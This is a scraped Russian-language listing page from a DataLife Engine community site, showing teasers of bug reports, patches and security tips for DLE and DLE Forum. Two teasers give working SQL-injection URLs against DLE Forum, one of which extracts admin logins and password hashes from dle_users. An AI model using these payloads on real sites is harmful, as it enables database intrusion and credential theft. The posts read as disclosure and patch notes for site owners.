Ошибка в версии: все версии
Степень опасности: Высокая
- Войти
- Регистрация
- Забыли пароль?
DLE
DataLife Engine- Главная
- Форум
- Регистрация
- Контакты
- Правила
Недостаточная фильтрация в модуле Переходы от 10.09.2011
Автор: NoSay от 13-09-2011, 18:33
Ошибка в версии: все версии
Степень опасности: Высокая
Подробнее
1096
1
Категория: Баги
Патч WYSIWYG редактора для DataLife Engine v.9.3
Автор: Corsair от 25-05-2011, 22:46
Уважаемые пользователи,
Новая версия DataLife Engine v.9.3 была предоставлена с WYSIWYG редактором новейшей версии TinyMCE 3.4.2, к сожалению данную версию редактора нельзя назвать стабильной, и в нем были обнаружены следующие проблемы:
1. Невозможность использования горячих клавиш Ctrl-V для вставки текста в браузере Опера 11.xx
2. Некорректная массовая вставка загруженных картинок на сервер.
Новая версия DataLife Engine v.9.3 была предоставлена с WYSIWYG редактором новейшей версии TinyMCE 3.4.2, к сожалению данную версию редактора нельзя назвать стабильной, и в нем были обнаружены следующие проблемы:
1. Невозможность использования горячих клавиш Ctrl-V для вставки текста в браузере Опера 11.xx
2. Некорректная массовая вставка загруженных картинок на сервер.
Подробнее
1395
0
Категория: Баги
Исправление бага с русскими никами в Online 5.0
Автор: Kuzia от 27-12-2010, 06:04
Исправление бага с русскими никами при переходе к профилю
Подробнее
629
0
Категория: Баги
Защита папок скрипта от запуска сторонних скриптов
Автор: Baggio от 26-10-2010, 16:26
Дорогие друзья,
в этой небольшой статье мы хотим рассказать вам о том как, как вам можно повысить безопасность вашего сайта. Как известно наибольшую угрозу для сайта представляют собой залитые злоумышленником на сервер PHP шеллы. Что это такое? Это PHP скрипты которые могут выполняться на вашем сервере, соответственно производить какие-либо изменения в файлах доступных для записи или могут, например читать содержимое конфигурационных данных и соответственно получать прямой доступ к базе данных. Каким образом могут попадать данные шеллы на ваш сервер? При обнаружении какой либо уязвимости в скрипте, или сторонних модулях, или вообще при наличии других уязвимых сторонних скриптов на сервере, или серверного ПО. Главная особенность заключается в том, что шеллы можно залить не в любые папки на сервере, а лишь в папки доступные для записи на сервере, и в DataLife Engine такими папками являются папки /uploads/ и /templates/, а также все вложенные в них папки. Данные папки должны иметь права на запись, т.к. вы в них заливаете посредством скрипта легальный контент, файлы, картинки, редактируете в админпанели шаблоны и прочее. И как правило в эти папки производится загрузка шеллов при обнаружении злоумышленником какой либо бреши на сервере в любом скрипте, даже не имеющем отношения к DataLife Engine. Можно ли защитить эти папки, в случае попадания в них зловредного PHP файла, ведь нельзя запретить доступ к этим папкам? Можно, и достаточно не сложно.
в этой небольшой статье мы хотим рассказать вам о том как, как вам можно повысить безопасность вашего сайта. Как известно наибольшую угрозу для сайта представляют собой залитые злоумышленником на сервер PHP шеллы. Что это такое? Это PHP скрипты которые могут выполняться на вашем сервере, соответственно производить какие-либо изменения в файлах доступных для записи или могут, например читать содержимое конфигурационных данных и соответственно получать прямой доступ к базе данных. Каким образом могут попадать данные шеллы на ваш сервер? При обнаружении какой либо уязвимости в скрипте, или сторонних модулях, или вообще при наличии других уязвимых сторонних скриптов на сервере, или серверного ПО. Главная особенность заключается в том, что шеллы можно залить не в любые папки на сервере, а лишь в папки доступные для записи на сервере, и в DataLife Engine такими папками являются папки /uploads/ и /templates/, а также все вложенные в них папки. Данные папки должны иметь права на запись, т.к. вы в них заливаете посредством скрипта легальный контент, файлы, картинки, редактируете в админпанели шаблоны и прочее. И как правило в эти папки производится загрузка шеллов при обнаружении злоумышленником какой либо бреши на сервере в любом скрипте, даже не имеющем отношения к DataLife Engine. Можно ли защитить эти папки, в случае попадания в них зловредного PHP файла, ведь нельзя запретить доступ к этим папкам? Можно, и достаточно не сложно.
Подробнее
2717
11
Категория: Баги
Недостаточная фильтрация входящих данных
Автор: DImkA от 14-09-2010, 13:50
Проблема: Недостаточная фильтрация входящих данных.
Ошибка в версии: Все версии
Степень опасности: Высокая
Ошибка в версии: Все версии
Степень опасности: Высокая
Подробнее
3229
22
Категория: Баги
Исправления в DLE Forum 2.5 для корректной работы со смайлами в DLE 9.0
Автор: Skater от 22-08-2010, 18:33
Автор: Skater_1992
Совместимость: DLE Forum 2.x (тестилось на 2.5)
Делаем чтобы смайлы показывались на DLE 9.0
Подробнее
3113
7
Категория: Баги
Очередная инъекция в DLE Forum
Автор: stuk от 23-06-2010, 13:20
Описание: sql-инъекция
Зависимость: register_globals = on
Файл: engine/forum/sources/showtopic.php
Кусок кода:
Как осуществить: http://site.com/?do=forum&act=topic&tid=1+[SQL]
Зависимость: register_globals = on
Файл: engine/forum/sources/showtopic.php
Кусок кода:
if (intval($tid))
$row_topic = $db->super_query("SELECT * FROM " . PREFIX . "_forum_topics WHERE tid = $tid");
$row_topic = $db->super_query("SELECT * FROM " . PREFIX . "_forum_topics WHERE tid = $tid");
Как осуществить: http://site.com/?do=forum&act=topic&tid=1+[SQL]
Подробнее
2944
7
Категория: Баги
SQL – инъекция в DLE-Forum 2.4
Автор: stuk от 11-06-2010, 21:31
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:
ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,
Подробнее
3484
20
Категория: Баги
Баг - получаем список доп. полей
Автор: Lion__ от 9-06-2010, 03:28
Данный баг позволяет просто скачать список доп. полей новостей и юзеров
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая
Нашёл очередной баг: Lion__
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая
Нашёл очередной баг: Lion__
Подробнее
2798
22
Категория: Баги
Баг - прямой вызов файлов и мусор в папках
Автор: Lion__ от 9-06-2010, 02:42
Данный баг позволяет производить прямой запуск файлов и мусорить в папках
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)
Нашёл очередной баг: Lion__
DLE уязвимость работает на версиях: ВСЕ DLE
Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)
Нашёл очередной баг: Lion__
Подробнее
2344
21
Категория: Баги
Недостаточная фильтрация входящих данных
Автор: DEN 007 от 8-06-2010, 03:51
Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта.
Ошибка в версии: Все версии
Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)
Ошибка в версии: Все версии
Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте)
Как исправить в полной новости...
Подробнее
3218
36
Категория: Баги
Проведение атаки межсайтового скриптинга (XSS)
Автор: neoks от 3-06-2010, 19:29
Проблема: При определенных условиях на сайт можно провести атаку XSS. Данными условиями является посещение авторизованным администратором, сайта злоумышленника, при этом использование администратором устаревшего браузера, что может привести к перехвату куков браузера.
Ошибка в версии: 7.x - 8.5
Степень опасности: Низкая
Для исправления скачайте и скопируйте на свой сервер патч:
Данный патч применим ко всем версиям: 7.x - 8.5
Ошибка в версии: 7.x - 8.5
Степень опасности: Низкая
Для исправления скачайте и скопируйте на свой сервер патч:
Данный патч применим ко всем версиям: 7.x - 8.5
Подробнее
2619
22
Категория: Баги
Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5
Автор: Macho от 29-04-2010, 14:20
Исправления в DLE Forum 2.5 для корректной работы в DLE 8.5 (полная инструкция)
Подробнее
5534
15
Категория: Баги
Запускаем DLE Forum 2.5 на DataLife Engine 8.5
Автор: Горбушка от 5-03-2010, 04:02
При установке форума на DataLife Engine 8.5 перестаёт работать быстрый ответ и ещё некоторые AJAX-элементы. Это вызвано серьёзными изменениями в DataLife Engine и переносом AJAX-файлов в другую папку.
Ввиду этого, нам необходимо самим подправить AJAX-файлы DLE Forum'а, чтобы он работал корректно.
Мы предоставляем Вам 2 инструкции: как для установки в папку /forum, так и для поддомена.
Подробнее
4708
11
Категория: Баги
фильтруем уязвимость в dle 8.2 и в раних версиях
Автор: nugumanov от 12-02-2010, 18:26
Прочитал на ачате уязвимость с названием "раскрытие путей", долго искал в поисках ответа,что за зверь раскрытие путей
Степень опастности: средняя
Подробнее
4389
19
Категория: Баги
Назад
Вперед
Последние комментарии
-
Написал: pilot233
CMS Авто Рынок 2.0 БесплатноАвтор: pilot233 11431 Тема: CMS Авто Рынок 2.0 Бесплатно
Ответ на предыдущий пост будет или как? -
Написал: Julian
Вывод полной новости во всплывающем окнеАвтор: Julian 11432 Тема: Вывод полной новости во всплывающем окне
А кто за вас будет библиотеки jQuery ставить?
Вот тогда он будет работать.
1. UI Core
2. UI Position
3.UI Widget
4. UI Mouse (Optional; only needed if using UI Draggable or UI Resizable)
5. UI Draggable (Optional)
6.UI Resizable (Optional)
Последних 2 пункта пожеланию. Это перемещение или увеличение окна. -
Написал: Dr.Parlament
Хак для новостей (случайные, популярные, последние)Автор: Dr.Parlament 11454 Тема: Хак для новостей (случайные, популярные, последние)
vikatka, это хак. Просто так получилось написать. Morgan,
читайте, там все описано. Вывод случайных популярных и последних новостей, с помощью не модулей разных, с которыми ещё сайт и дольше грузится, а с помощью стандартного тега, только надо исправить пару файлов. И при этом не устанавливать модули, не копаться во многих файлах и менять и т.д. Сразу можно и с картинкой и без нее, как хотите. Туда даже включаются доп.поля. -
Написал: boleg
CMS Авто Рынок 2.0 БесплатноАвтор: boleg 11431 Тема: CMS Авто Рынок 2.0 Бесплатно
Вопрос! Админ панель,какой логин и пароль по умолчанию стоит?
CMS Авто Рынок 2.0 Бесплатно.Действительно бесплатно или очередной лоха трон. -
Написал: Strannik89
Gamer-Life для DLE 9.5 , 9.4 + модулямиАвтор: Strannik89 11451 Тема: Gamer-Life для DLE 9.5 , 9.4 + модулями
не работает меню юзера. вобше. и выйти нереально. -
Написал: iksok
S-Blocks v1.9 NULL для DLE 9.3Автор: iksok 11091 Тема: S-Blocks v1.9 NULL для DLE 9.3
Поставил , всё работало отлично!
А потом... ух... в админке вместо панели управления блоками рекламка и всё... пзц!
пришлось на 1,7 переходить
у кого такая же проблема ?
аа.. это была подгрузка сайта NullTeam.WS -
Написал: yesait
Gamer-Life для DLE 9.5 , 9.4 + модулямиАвтор: yesait 11451 Тема: Gamer-Life для DLE 9.5 , 9.4 + модулями
kiosaki, Когда я проверял шаблон на левые ссылки ничего подозрительного не нашёл! -
Написал: micsoft
DleTrack 1.2 -Бесплатно!Автор: micsoft 11445 Тема: DleTrack 1.2 -Бесплатно!
:лаугхинг: [left][/left][center][/center Показать / Скрыть текст -
Написал: kiosaki
Gamer-Life для DLE 9.5 , 9.4 + модулямиАвтор: kiosaki 11451 Тема: Gamer-Life для DLE 9.5 , 9.4 + модулями
Будьте внимательны, полно левых скрытых ссылок! -
Написал: Morgan
Хак для новостей (случайные, популярные, последние)Автор: Morgan 11454 Тема: Хак для новостей (случайные, популярные, последние)
что то я сам не понил что за хак или модуль это и что он делает?
Популярные статьи
- HTML шаблон "Web-portal" от Vipteam за 5$
- D5-cinema
- Gamer-Life для DLE 9.5 , 9.4 + модулями
- Хак для новостей (случайные, популярные, последние)
- Перекрашенная версия шаблона Gemini для DLE 9.3 - 9.5
- Site-Portal (red) DLE 9.5
- DleTrack 1.2 -Бесплатно!
- Шаблон для кино
- Affinity - адаптация для DLE 9.5
- Шаблон сайта yephone (оригинал + psd)
Только у нас
dle шаблоны бесплатные
для DataLife